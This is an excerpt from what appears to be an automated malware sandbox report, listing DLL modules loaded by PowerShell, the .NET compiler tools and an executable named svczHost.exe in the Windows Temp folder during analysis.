        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\Temp\svczHost.exeSection loaded: apphelp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ncrypt.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ntasn1.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: edgegdi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: icu.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: winhttp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: mswsock.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: wshunix.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: dnsapi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: winrnr.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: nlaapi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: wshbth.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: devobj.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: napinsp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: cryptsp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: rsaenh.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: cryptbase.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ntmarta.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: winnsi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: sspicli.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: schannel.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: msasn1.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
